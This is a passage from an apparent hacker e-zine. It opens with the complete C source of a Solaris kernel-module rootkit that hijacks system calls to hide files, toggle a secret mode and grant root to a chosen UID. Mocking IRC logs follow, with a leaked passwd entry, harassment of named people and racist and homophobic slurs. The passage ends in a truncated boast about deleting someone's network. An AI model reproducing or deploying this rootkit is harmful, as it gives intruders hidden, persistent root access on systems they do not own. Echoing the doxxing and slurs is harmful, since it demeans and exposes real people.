.~v~----------------------------------------------------------~v~.
; *05* ~v~ REAL solaris h4ckr LKM -- jobe ;
`----------------------------------------------------------------'

j0be d1dnt subm1t thiz, but it h4d t0 be includ3d.. itz hil4ri0us.
j0be'z email is jobe@hert.org, jbowie@slack.net, jobe@segfault.net,
fe4l fr33 t0 dr0p th1z l4m4h a l1n3. th1s lkm he inst4llz 0n n4s4
ultrasp4rc s0lariz's t0 sekure h1z axx3ss t0 the sp4c3sh1pz. enj0y.

[BEGIN_DIR] 05_jobelkm
[CUT_HERE] haha.c
#include <sys/systm.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/procfs.h>
#include <sys/sockio.h>
#include <sys/socket.h>
#include <sys/kmem.h>
#include <sys/errno.h>
#include <net/if.h>
#include <sys/stat.h>
#include <fcntl.h>

#include <sys/modctl.h>

#define ELITE "bssmagik"
#define TMS "nokkk"
#define UID 35303
#define SWAPME "ls-"

char elite[] = ELITE;
char tms[] = TMS;
char swapme[] = SWAPME;
int el8mode = 0;

extern struct mod_ops mod_miscops;

extern struct sysent sysent[];

static struct modlmisc mlink = {
&mod_miscops,
"streams string mod"
};

static struct modlinkage modlinkage = {
MODREV_1,
(void *)&mlink,
NULL
};

int (*oldexecve) (const char *, const char *[], const char *[]);
int (*oldopen64) (const char *, int, int);
int (*oldcreat64) (const char *, mode_t);
int (*oldchdir) (const char *);
int (*oldgetdents64) (int, struct dirent64 *, size_t);
int (*oldlstat64) (const char *, struct stat64 *);

int lstat644me(fname,stats)
const char *fname;
struct stat64 *stats;
{
int len;
char *name;
name = (char *)kmem_alloc(256,KM_SLEEP);

copyinstr((char *)fname,name,256,(size_t *) &len);
if (!el8mode && strstr(name,(char *)&elite) != NULL) {
set_errno(ENOENT);
return -1;
} else return oldlstat64(fname,stats);
}

int execve4me(fname,argv,envp)
const char *fname;
const char *argv[];
const char *envp[];
{
int ret,len;
char *name;

name = (char *)kmem_alloc(256,KM_SLEEP);
copyinstr((char *)fname,name,256,(size_t *) &len);

if( el8mode && strstr(name,(char *)&swapme) != NULL) {
switch(curproc->p_cred->cr_uid) {
case 0:
curproc->p_parent->p_cred->cr_uid = UID;
curproc->p_parent->p_cred->cr_ruid = UID;
break;
case UID:
curproc->p_parent->p_cred->cr_uid = 0;
curproc->p_parent->p_cred->cr_ruid = 0;
break;
default:
cmn_err(CE_NOTE,"What you talkin bout Willis?"); break;
}
cmn_err(CE_NOTE,"UID is: %d\nPID is: %d", curproc->p_cred->cr_uid,curproc->p_pidp->pid_id);
set_errno(ENOENT);
return -1;
} else return oldexecve(fname,argv,envp);
}

int getdents644me (fd,dentz,szin)
int fd;
struct dirent64 *dentz;
size_t szin;
{
int i,ret,oldret,reclen;
struct dirent64 *dirent1,*dirent2;

oldret = (*oldgetdents64) (fd,dentz,szin);
ret = oldret;

if (ret > 0) {
dirent1 = (struct dirent64 *) kmem_alloc(ret,KM_SLEEP);
copyin((char *)dentz,(char *)dirent1, ret);

dirent2 = dirent1;
i = ret;

while (i > 0) {
reclen = dirent2->d_reclen;
i -= reclen;

if(strstr((char *) &(dirent2->d_name),(char *) &elite) != NULL) {
if (i != 0)
memmove(dirent2, (char *)dirent2 + dirent2->d_reclen, i);
else
dirent2->d_off = 1024;
ret -= reclen;

}
if (dirent2->d_reclen < 1) {
ret -= i;
i = 0;
}
if (i != 0)
dirent2 = (struct dirent64 *) ((char *)dirent2 + dirent2->d_reclen);
}

copyout((char *)dirent1,(char *)dentz,ret);
kmem_free(dirent1, oldret);
}
return ret;
}

int creat644me(name,mode)
const char *name;
mode_t mode;
{
char iname[1024];
int len;

copyinstr((char *)name,iname,1028,(size_t *) &len);

if (strstr(iname,(char *)&tms) != NULL) {
switch(el8mode) {
case 0:
el8mode = 1;
cmn_err(CE_NOTE,"Security off");
break;
case 1:
el8mode = 0;
cmn_err(CE_NOTE,"Security on");
break;
default:
break;
}
set_errno(ENFILE);
return -1;
}
return oldcreat64(name,mode);
}

int chdir4me(newdir)
const char *newdir;
{
char name[1028];
int len;

copyinstr((char *)newdir,name,1028,(size_t *) &len);

if ( !el8mode && strstr(name,(char *)&elite) != NULL ) {
set_errno(ENOENT);
cmn_err(CE_NOTE,"Why did I change dirs?");
return -1;
}

return oldchdir(newdir);
}

int open644me(name,fmode,cmode)
const char *name;
int fmode;
int cmode;
{
int ret;
int len;
char fname[1028];

ret = oldopen64(name,fmode,cmode);

if (ret >= 0) {
copyinstr((char *)name,fname,1028,(size_t *) &len);
if (el8mode && strstr(fname,(char *)&elite) != NULL) {
set_errno(ENOENT);
return -1;
}
}

return ret;
}

int _init(void)
{
int x;

if ((x = mod_install(&modlinkage)) != 0)
cmn_err(CE_NOTE,"Unable to install module\n");

oldchdir = (void *) sysent[SYS_chdir].sy_callc;
oldcreat64 = (void *) sysent[SYS_creat64].sy_callc;
oldopen64 = (void *) sysent[SYS_open64].sy_callc;
oldexecve = (void *) sysent[SYS_execve].sy_callc;
oldgetdents64 = (void *) sysent[SYS_getdents64].sy_callc;
oldlstat64 = (void *) sysent[SYS_lstat64].sy_callc;

sysent[SYS_chdir].sy_callc = (void *) chdir4me;
sysent[SYS_execve].sy_callc = (void *) execve4me;
sysent[SYS_creat64].sy_callc = (void *) creat644me;
sysent[SYS_open64].sy_callc = (void *) open644me;
sysent[SYS_getdents64].sy_callc = (void *) getdents644me;
sysent[SYS_lstat64].sy_callc = (void *) lstat644me;

return x;
}

int _info(struct modinfo *modinfop)
return (mod_info(&modlinkage, modinfop));
}

int _fini(void)
{
int x;

if ((x = mod_remove(&modlinkage)) != 0)
cmn_err(CE_NOTE,"Unable to uninstall module\n");

sysent[SYS_chdir].sy_callc = (void *)oldchdir;
sysent[SYS_execve].sy_callc = (void *)oldexecve;
sysent[SYS_creat64].sy_callc = (void *)oldcreat64;
sysent[SYS_open64].sy_callc = (void *)oldopen64;
sysent[SYS_getdents64].sy_callc = (void *)oldgetdents64;
sysent[SYS_lstat64].sy_callc = (void *)oldlstat64;

return x;
}
[END_CUT] haha.c
[END_DIR] 05_jobelkm

funny j0be l0gz.. ge he ha ge ha ha ha he ha ha he ha

<maztrmind> SUP
<x0x> EVADING BANS ON #PHRACK, YOU?
<maztrmind> not2much
<maztrmind> man if silitek banned me i'd just do up black.sundevil.org like i
did up that gay ass azrael.phrack.com
<x0x> UNFORTUNATLY, JOBE BANNED ME
<maztrmind> well jobe is even gayer than silitek
<route> joeb?
<route> who op'd jobe?
<x0x> DROPZONE DID
<x0x> THAT CANUCK ANTI-AMERICAN FAGGOT
<route> I see.
<maztrmind> wtf is dr0pz0n3
<route> I don't think he's anti-american.
<maztrmind> isnt that that gay movie w/ wesley snipes
<x0x> THAT MOVIE WAS GOOD, ILL RIP YOUR ARM OFF AND JACK MY DICK WITH IT
MAZTRMIND
<maztrmind> hah
<maztrmind> that was good
<maztrmind> hey jobe
<maztrmind> whats going on du0d
<maztrmind> u still hackin away @ sol?
<x0x> HE'S BUSY WORKING ON SOLARIS STREAMS DRIVERS
<maztrmind> hah
<x0x> YEH IM WATCHING HIS TERM RIGHT NOW
<maztrmind> "Dude Im gonna write like a solaris kernel module that protects it
from all attacks"

<maztrmind> bahahahaha
<x0x> I HAVE GOT HIS PEICE OF DOGSHIT CUMDRIP LKM THAT HE BACKDOORS NASA WITH
<x0x> HE'S WORKING ON LKM SHELLCODE TOO
<maztrmind> lkm shellcode
<maztrmind> i dont understand
<x0x> ASK HIM, IT'S HIS REVOLUTIONARY IDEA
<maztrmind> is that the one he was talkin about that opens /dev/kmem and
writes some shit
<maztrmind> the shellcode actually does that
<x0x> WHEN HE REMOTLY PENETRATES A SOLARIS COMPUTER WITH STATD, HIS SHELLCODE
WILL LOAD HIS ELITE LKM IN SOME SPECIAL WAY
<x0x> OH, PROBABLY
<maztrmind> how dumb is that
<x0x> I HEARD IT READS IN THE LKM, PUTS IT ON DISK
<x0x> THEN LOADS IT
<maztrmind> i dont see the point
<maztrmind> when u can just exec csh and load it urself
<maztrmind> or sh
<maztrmind> whatever
<x0x> HE'S ADVANCED..
<maztrmind> jobe
<maztrmind> why dont u shed some light on this shit
<maztrmind> "R00TGOD"
<maztrmind> hahahaha
<x0x> YEH R00TG0D BRING YOUR FAGGOT ASS INTO THIS CONVERSATION BEFORE I RIP MY
CAPS KEY OFF AND JAM IT INTO YOUR OVERSIZED FOREHEAD
<maztrmind> pahah
<maztrmind> y0
<maztrmind> send me that lkm
<maztrmind> source
<x0x> ILL TRADE YOU IT FOR SILITEK'S MAIL SPOOLS
<maztrmind> hold on
<maztrmind> sorry dude all that shit got taken in the raid
<x0x> MAZTRMIND? MOSTHATED?
<maztrmind> nope
<maztrmind> <- lorenzo
<x0x> OH YES
<maztrmind> m0zth8d rules though
<x0x> CAN'T YOU CALL THEM UP AND ASK FOR THE SPOOLS
<maztrmind> hahahaha
<x0x> YOU CAN OFFER THEM JOBELKM.C
<x0x> OR LOGS OF JOBE HACKING
<maztrmind> hahaha dump logs
<maztrmind> !!!
<x0x> NOT VERY INTERESTING JUST A BUNCH OF RPCSCAN'S AND DROPSTAT
<x0x> HES INTO SOME X25 SHIT TOO
<x0x> TRYING TO GET INTO BANKS TO HACK THE TALEBAN
<maztrmind> is he?
<maztrmind> heh




.~v~----------------------------------------------------------~v~.
; *06* ~v~ ~el8 ECHELON BASE -- SiLLY G00S3 ;
`----------------------------------------------------------------'

TH3 ~EL8 ECHEL0N B4SE IZ UP 24/7 DEDICAT3D T0 SN1FF1NG ALL IRC CONVOZ
ON EVERY IRC NETWORK THAT EXIZTS. DURING THE RELE4S3 0F ~EL8[1], THE
GAYD4R WENT FURIOUZ, A FELL0W BY THE N4M3 0F C4DD1S WUZ DISSING ~EL8.
MIND YOU, HE IS GAY AS F.U.C.K. H3R3 ARE S0ME L0GZ 0F HIM AND H1Z KR3W,
ALSO RETCH RUX. P00R C4DD1S. P00R C4DD1S. P00R C4DD1S. P00R C4DD1S.

enr1c0 [root@subterrain.net] has joined #!el8
<enr1c0> W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) R3D H0T W4R3Z
<enr1c0> W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) R3D H0T W4R3Z
<enr1c0> W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) R3D H0T W4R3Z

*** BY THE W4Y, THAT U R L HAZ CH4NG3D. ALSO, CRIPTO WILL SHIT HIS TRAINING
*** P4NTZ WHEN HE RE4DZ TH3S3 L0GS.

enr1c0 [root@subterrain.net] has left #!el8 []
mode/#!el8 [-k sparc32] by bitsplice
mode/#!el8 [+k sparc64] by bitsplice
<bitsplice> 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
1
<bitsplice> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<bitsplice> | Handle: so1o,so7o,t,es | Affiliations: Code ZeRo, m1lw0rm, |
<bitsplice> |> ashtray, ns2.co.uk, coderz.org 0r s0me shYt
|
<bitsplice> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<bitsplice> | Contributions: Code ZeRo, Defaced many a webp4ge, mscan'd many|
<bitsplice> |> a netw0rk, wuz the b1ggezt k0urieR in h4kr h1story, k0uri3r'd|
<bitsplice> |> many a k0de, wuz in m
<bitsplice> heh
<caddis_> http://packetstorm.securify.com/mag/~el8/el8_1.txt
<caddis_> someone hacked krill
<caddis_> :)

*** THAT M34NZ TH3Y H4CK3D Y0U, H0M0.

ry4n: #crocodile_wrestling (Leaving)
<retch> heh
<retch> From: majestic@area51.acidnet.org
<retch> hehe
<retch> if ((m1xt3r = popen(prognam, "w")) == NULL) {
<retch> perror("p o p e n");
<retch> exit(0);
<retch> }
<retch> hehe this code is ruxin me
SignOff caddis_: #!el8,#crocodile_wrestling (Read error: 145 (Connection timed out))

*** AKTIVLY M0NIT0RING HIZ IRC SESSION, WE D3C1D3D T0 TCPZ4P HIM.

<retch> man
<retch> they need to ease up
<retch> with the irc logz

*** S0RRY RETCH, THIZ IS PRETTY FUNNY SHIT TH0UGH D00D.

<pc> i fink butt fucker dogcow has taken them of line
<pc> of/off
<h4r1k1r1> logs?
<retch> while(1)
<retch> {
<retch> putpenis("8====D (_O_)");
<retch> putpenis(" 8====D(_O_)");
<retch> putpenis(" 8====D_O_)");
<retch> putpenis(" 8====DO_)");
<retch> putpenis(" 8====D_)");
<retch> putpenis(" 8====_)");
<retch> putpenis(" 8===_)");
<retch> putpenis(" 8====_)");
<retch> putpenis(" 8====D_)");
<retch> putpenis(" 8====D_O_)");
<retch> putpenis(" 8====D(_O_)");
<retch> }
<retch> return 0;
<retch> MAN
<retch> THAT IS SOME
<retch> ELITE ASCII W0RQ

*** S1D3 N0TE, THAT G4VE ME AN ERREKTION.

<pc> heh
<retch> hehe and replete with silvio dis

*** S1LVI0 SUCKZ ETHIOPIAN DINGLE BARRY COCK.

<caddis_> retch: are you reading the silvio pop-up book?
<caddis_> hehe
<retch> http://packetstorm.securify.com/mag/~el8/el8_1.txt
<retch> WHAT CAN A UNIX VIRUS DO?
<retch> --------------------
<retch> Virus's are very fascinating, their very existance is superior to that of the
<retch> mind controling human. A UNIX virus can do basically anything with the correct
<retch> privledges.
<retch> ME UNIX
<retch> o o <- [ Can i have ] 01010101010100 -> [ Why yes ]
<retch> _\ [ ROOT access] 01010101010100 [ you may.]
<retch> . . [ please ? ] 01010101010101
<retch> \____/ 01010101010011
<retch> 01010110101010
<retch> "mind controlling human" haha
<caddis_> I think RLoxley probably had something to do with this mag
<retch> it's fucking hilarious
<caddis_> it's crap
<retch> _|_
<retch> caddis is cut up
<retch> all this intergroup disin rux
<retch> doesn't happen in the vir scene anymore
<retch> well not enough anyway
<caddis_> it seems like the same childish person who has some deep emotional scares
<retch> haha do you cunts take this seriously or something
<caddis_> well maybe if it was the same ppl all the time
<caddis_> and they put their name of it
<retch> hehe funny cuntz
<h4r1k1r1> hi
<caddis_> hi
<caddis_> retch: it's not funny

*** Y0U'RE N0T FUNNY LAMER, YOU'RE NAI DOS ON BUGTR4Q WUZ KU0L TH0UGH.
*** Y4H, N0W EVERYONE KN0WS WH0 DID IT, D0NT STEP YOU'LL GET STEPD ON.

<dhp> retch: whats funny?
<retch> caddis
<retch> i found myself laughing
<retch> i'm very sorry
<dhp> ?
<retch> ^_^
<retch> http://packetstorm.securify.com/mag/~el8/el8_1.txt
<dhp> what?!
<caddis_> h0h0 w3 'r fun'33 b0yz, l3tz d0 suM m0r3 0r1gn4l hUm'Ma & g1v3 sh1t 2
l0r3 + s010
<retch> caddis
<retch> are you smarting
<dhp> oh good
<caddis_> oo=====)~ <- h0h0 l00k @ m4 azcII d1ck h0h0

*** IS TH4T WH4T Y0UR AB0RIGINY DINGLE D0NKEY LOOKS L1K3.

<retch> hehe caddis is smartin++
<pc> hrmmmm
<pc> hrmmmm
<retch> 8====D (_o_)
esko_zzzz is now known as esko
<caddis_> What am I smarting about?
<esko> omfg... 9pm -> 11am
<pc> esko^B:^B not a bad effort :)
<dhp> caddis_:x:1008:100:,,,:/home/caddis:/bin/bash

*** BAHAAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
*** <deep breathe>
*** HAHAHAHAHA HHSSHAHHA H0HA0AH HAH HAHAAHAHHAH HQHAAH

<dhp> that?
<esko> musta been a tired boi!
<caddis_> that's krills box
<retch> hehe
<caddis_> I don't really care
<caddis_> but I must say
<caddis_> I fear their hashless password grabbing technique

*** Y0U ST4RT1NG TR0UBLE AGAIN? XNEC W1LL BE4T YOU UP AT DEFCON

<esko> ne1 here got a softice manual in pdf ?
<dhp> heh
<dhp> tah esko
<pc> only a shadowed passwd file at that
<dhp> I would like to thank caddis of TESO. He started the whole OpenBSD
<dhp> war. Keep up the good work.
<pc> hrmmm
<pc> one would susspect that caddis was searching for his name on packetstorm :P
<caddis_> erm no
<dhp> <- cut&paste
<pc> j/k
<caddis_> --> enr1c0 (root@subterrain.net) has joined #!el8
<caddis_> <enr1c0> W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z (packetstorm.securify.com/mag/~el8/el8_1.txt && el8.8m.com) W4R3Z
<esko> dhp: copy&paste :P
enr1c0 [root@subterrain.net] has joined #!el8
#!el8
<enr1c0> w4r3z w4r3z w4r333333333333333333333333333333z packetstorm.securify.com/mag/~el8/el8_1.txt 0R U K4N V1S1T H3R3 el8.8m.com
<enr1c0> h3y d00d5
<enr1c0> h0\\/s 1t g01nG
<caddis> good
<enr1c0> g00dby3 im 0ut
<enr1c0> h3y
<caddis> hi
<enr1c0> h4ppy gnu y34r
<twd> y0
<buo> i think i have to leave sooin
<buo> -i
<twd> hah. jennicides mail spool

*** Y0U TH1NK TH4TZ FUNNY? I G0T AH0LD 0F H3R PANTIEZ N D00SCHE R4G.

<buo> i will check train timetablez
<enr1c0> y0 th3 w4r3z d00d
<twd> so far this is better than bow10!

*** WH3R3Z B0W11? D0NT GIVE UP, D0NT EVER G1VE UP.

<enr1c0> i d0nt kn0w ab0ut all th4t
<enr1c0> 1tz f0r y0u th0ugh p4l, h0p3 y0u enj0y 1t
<meta> weewee
<enr1c0> h3y br0
<meta> r1c0-su4v3?
<enr1c0> y4h
<enr1c0> ah l4y ah r1c0, su4444v34y

*** TH4T GUY IZ H0T++

<meta> werd2th@
<enr1c0> yup s0 h0wz y0ur gnu y34r p4l
<twd> yo meta. did ur girl ever stop puking enuf 4 u to bang her last night?
<meta> no
<meta> i just got done banging her tho
<twd> :>
<meta> 1st b4ng of the jew year
<enr1c0> y0 du0d i g0t s0m3 g00d adv1c3
<enr1c0> sh0w h3r putpenis.c y0u w1ll b0th g3t arr0ws3d
<meta> give. plz. thx.
<meta> i already did
<enr1c0> 0k y0u ar3 0n t0p 0f the g4me
<meta> du0d
<meta> i alwayz am
<meta> du0d
<meta> who is this jordan s lamer?
<enr1c0> h3z curr3ntly 1n 4n m3nt4l inst1tuti0n
<twd> y4h really
<enr1c0> 0k eye'll t3ll y0u the truth, th4tz j3nn1c1d3z b0yfr13nd sh4mc0ck
<enr1c0> th4tz h0w th3y f1rst all0p3d
<meta> d00d
<meta> twd needs a trading card ;<

*** H3 WUZ T00 F4T T0 F1T 0N IT. HAH4HAHAHAH PLUS H3 CANT H4CK.

<meta> he saves girls from suicide
<meta> nightly
<meta> :<
<enr1c0> 0k ill t4ke n0te 0f th4t
<meta> -gets(buf);
<meta> +fgets(buf,80,stdin);
<meta> bwahaha
<sdr> from #suicide
<sdr> or #depression
<twd> erm
<twd> no!
<enr1c0> i s4v3d r0ut3 fr0m suicid3 in #phrack 0nc3
<enr1c0> n0l13
<meta> d00d, how come there r no interesting warez

*** M4YBE ILL STICK Y0UR MAILSPOOLZ IN THE N3XT ISSUE, FUCKHER.

<meta> in that mag ;<
<enr1c0> l1k3 wh4t, m4yb3 th3 w4r3z in th3 m4g 1z b3y0nd y0u
<meta> they r just silly things, nothing really useful ;< except maybe putpenis.c
<enr1c0> y0u 0bvi0usly 0verl00k3d th3 rm -rf / sh3llk0d3, and th3 m4ilb0mb3r
<enr1c0> du0d am i in a h4ck3r ch4nn3l 0r wh4t
<meta> oh forgive me, the rest was oh so exciting, the elite-speak-converter wowed me so

*** MAN FUCK Y0U.. YOU'RE TO4ST.

<twd> the first el8 has some good ware too
<enr1c0> wh3r3z s1lvi0 g0t4 th4nk h1m f0r h1s submissi0n
<enr1c0> my k1ds l0v3d 1t
<meta> lore@insomnia~#) banner 10000 A's
<meta> doesn't even know how to use perl to generate 10000 A's? :<

*** N0T EVERY0N3 IS A W0RTHLESS UUNET ADM1N LIKE Y0URSELF!

<enr1c0> du0d3 l0r3 1snt th4t br1ght
<meta> silvio's article is the best in there :<
<meta> it has the most pictures
<meta> !@!
<enr1c0> y4h i w1sh th3 milli0n m4n m4rch virus w0uld v1s1t my h0us3
Krill [majestic@ocmax10-182.dialup.optusnet.com.au] joined #crocodile_wrestling
mode/#!el8 [+i] by bitsplice
enr1c0 was kicked off #!el8 by bitsplice (r1c0 su4v3)
<bitsplice> who gave him the key?

*** LOOK IM ST1LL H3R3 F4TASS, CAN YOU FIND ME.

mode/#!el8 [+b *!*alone@el8.org] by bitsplice
aloan was kicked off #!el8 by bitsplice (die)
mode/#!el8 [-sik sparc64] by bitsplice
mode/#!el8 [+k vax2k] by bitsplice

*** H3Y GUESS WHAT, IM ST1LL H3R3 DUMBASS, THATS WHY ITZ K4LL3D SN1FFING.

<dhp> Krill(majestic@ocmax10-182.dialup.optusnet.com.au): hmm, guess that will teach
<dhp> me hey
<dhp> -> (krill) dont think its much to be worried about
<dhp> Krill(majestic@ocmax10-182.dialup.optusnet.com.au): nah
<dhp> Krill(majestic@ocmax10-182.dialup.optusnet.com.au): i guess this came out
a
<dhp> while ago hey..
<dhp> Krill(majestic@ocmax10-182.dialup.optusnet.com.au): anyway, thanks for pointing
<dhp> that out
<dhp> -> (krill) np's.. i thought you would have known
<dhp> join!#crocodile_wrestling -> howler_(~howler@access148.touch88.com.au)
<dhp> <Krill> hmm.. the smell of stale beer is in the air.. i should really clean up
<dhp> @dhp(+iw) #crocodile(+kst g-dog) (FFUCKFUFCKFJFIODSFIJ
<dhp> TTSSH IS OFFICIALLY FUCKED
<caddis> krill
<caddis> ur passwd file is in a magazine
<vIk> anyone seen takedown
<vIk> about mitnick
<vIk> heh
<caddis> for some reason
<Krill> yea
<esko> can anyone explain 'JNB' to me ?
<caddis> did you see it?
<howler_> passwd file in a magazine?!
<Krill> yeah
<Krill> when i was on acidnet.org
<Krill> ages ago now..
<Krill> :P
<howler_> weird
<howler_> heh
<dhp> caddis: how so ?
<caddis> Well it seems to me
<caddis> satanists are just disgruntled children of preachers, priests and other relegion people.
<howler_> krill:x:100:100:K seekret alien d0od:/roswell:/bin/sh
<Krill> heh, wtf..

*** 4H4H4H4H HE JUST SHIT H1S P4NTZ. HE N33DZ "00PZ I P00P3D MY P4NTZ!".

<silvio> buo. have you got a pocket protector?
<howler_> haha
<retch> hehe
<buo> why would i want to protect my pocketz
<buo> ?
<silvio> to go with jour fat framed glasses
<retch> buo
<retch> silvio is ruxing you
<buo> silvio can _|_
<silvio> retch and buo have like taken over #crocodile_wrestling
<silvio> omg
<retch> silvio
<buo> [16:55] *** buo: you can't do that thing, when you don't have that swing (you're not channel operator)
<retch> what are you talking about
<buo> thats el8
<buo> /topic #crocodile_wrestling t4k30v4h
<buo> /topic #crocodile_wrestling t4k30v4h
<silvio> this channel is run by people who dont even live to code.. what is the
world coming too..
<buo> you dont code at all now
<buo> so fuqup
<retch> silvio writes stupid docs
<silvio> haha
<retch> and gets ruxed by ~el8

*** RUX'D BY ~EL8 M0THERFUCK3R

<majere> can I just make fun of so1o '97 then?
<retch> gettin down with quentin
<caddis> yes
<majere> and codezero?
<caddis> no
<caddis> I use to read codezero

*** TH4T EXPL4INZ WHY Y0U'RE S0 CL00L3SS

<majere> and his elite amnesty.org defacement?
<caddis> and it was good
<majere> hmm, well then again, CIH was good
<caddis> CRH is what i am thinking of
<caddis> codezero was the group
<majere> but damnit, come on, the codezero phear nation is
just too funny to pass up!
<buo> the cih viruz ruxt me once
<buo> almost twice
<buo> !
<buo> and i infected my schools computers with the virus
<buo> like heaps of them
<caddis> is zhasper working at jigsaw now?
<buo> i think so
<caddis> That sums up the intro, on to WHAT CAN A UNIX VIRUS DO?
<caddis> WHAT CAN A UNIX VIRUS DO?
<caddis> --------------------
<caddis> Virus's are very fascinating, their very existance is superior to that of the
<caddis> mind controling human. A UNIX virus can do basically anything with the correct
<caddis> privledges.
<caddis> ME
UNIX
<caddis> o o <- [ Can i have ] 01010101010100 -> [ Why yes ]
<buo> someone new is there now i think
<caddis> _\ [ ROOT access] 01010101010100 [ you may.]
<caddis> . . [ please ? ] 01010101010101
<caddis> \____/ 01010101010011
<caddis> 01010110101010
<caddis> Once you have the correct permissions, here's what you can do:
<caddis> Infect many processes on the system:
<caddis> _____
<caddis> This shows ho
<ronin> hahaha
<caddis> This shows how the virus's spread. Look at each ones eyes, they differ
<caddis> from the other. This is what we call maximum stealthism! It makes it
<caddis> hard for virus detectors to find the virus's.
<ronin> slick!
<Hostile> this is pathetic, you'd think if you were going to post a exploit to bugtraw you would try it on your own machine, let alone someone elses
<majere> man, that ascii looks like a whole bunch of raver
sluts peaking
<buo> ITZ FULL STEALF
<caddis> Backdoor the systems:
<caddis> (telnet system 31337) (*:backdoor
LISTEN)
<caddis> hacker system
<caddis> O -> [] -> |----|
<caddis> < | - |
<caddis> |\ |____|
<caddis> A hacker (yourself) can gain access to a system, and run even more
<caddis> virus. Running many virus's is called a "parade" amongst us virus
<caddis> writers.
<caddis> Destroy your system:
<caddis> $ ls
<caddis> Removing /usr/bin/printf..............done
<caddis> This virus hides, waiting, forever if it hasto,

  
then, when all
<caddis> section WHAT CAN A WINDOWS VIRUS DO?
<majere> hahahaha
<Hostile> well at least it aint as stale as his other article

*** HH4HAHAHAHA HAHA H AH HA HA HAH AHAHAHAH HAAH H

<buo> who wrote that cra ?
<buo> +p
<caddis> dunno
<caddis> it's the only amusing article
<majere> heh
<caddis> the rest are shit

*** Y0U W1LL P4Y F0R TH4T.

<majere> have you seen the b4b0 log of so1o?
<majere> it's mad funny
<majere> http://www.b4b0.org/zine/b4b0-02.txt
<majere> I know he might be alright now
<majere> but uhhm, he once wasn't
<majere> which is why I bag him
<caddis> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<caddis> | Handle: route | Affiliationz: Phrack, The Guild, TiC, LIBNET |
<caddis> |> Packetfactory, r00t, r00tparty, layer8
<buo> <caddis> | Famous line: "* route is away [coding]" |
<buo> that rux
<caddis> | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000
|
<caddis> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<caddis> http://packetstorm.securify.com/mag/~el8/el8_1.txt
<majere> man, neon knights so owns me
<buo> hm
<ronin> [~el8_official_lamest_du0dz_on_the_inet] -> Chris Evans, lcamtuf
<ronin> [~el8_official_rm_this_box_get_k0dez] -> www.netcat.it
<ronin> [~el8_official_DoS_this_box_get_propz] -> www.netcat.it

0K FUCK TH0SE L0GZ SUCK. THE C0NCLUSI0N, FIRST, Y0UR N0T S4F3. SEC0ND
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX
~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX~el8 RUX




.~v~----------------------------------------------------------~v~.
; *07* ~v~ SUM(n1gga th@ g0t rm'd) -- DoDDaN ;
`----------------------------------------------------------------'

DEAR ~EL8 EL8S, THIS IS YOUR DEAR FRIEND DEPARTMENT OF DEFENSE DAN.
INCLUDED IN THIS SUBMISSION IS A BUNCH OF EMAILS CAPTURED OFF AN
@HOME CARNIVORE SESSION. KEEP IN MIND THIS MATERIAL IS EYES-ONLY
DEEP THROAT CLASSIFIED. APPARENTLY SOME NIGGA WHO IS KNOWN AS DAP
IN THE HACKER SCENE, GOT HIS ENTIRE NETWORK AND HIS FRIENDS NETWORKS
RM'D (REMOVED WITH AN RM -RF /). MY SOURCES HAVE TOLD ME HE RAN A
PRIVATE SHELL/DEVELOPMENT SYMPOSIUM AT LOGDIN.COM. I AM SUSPECT TO
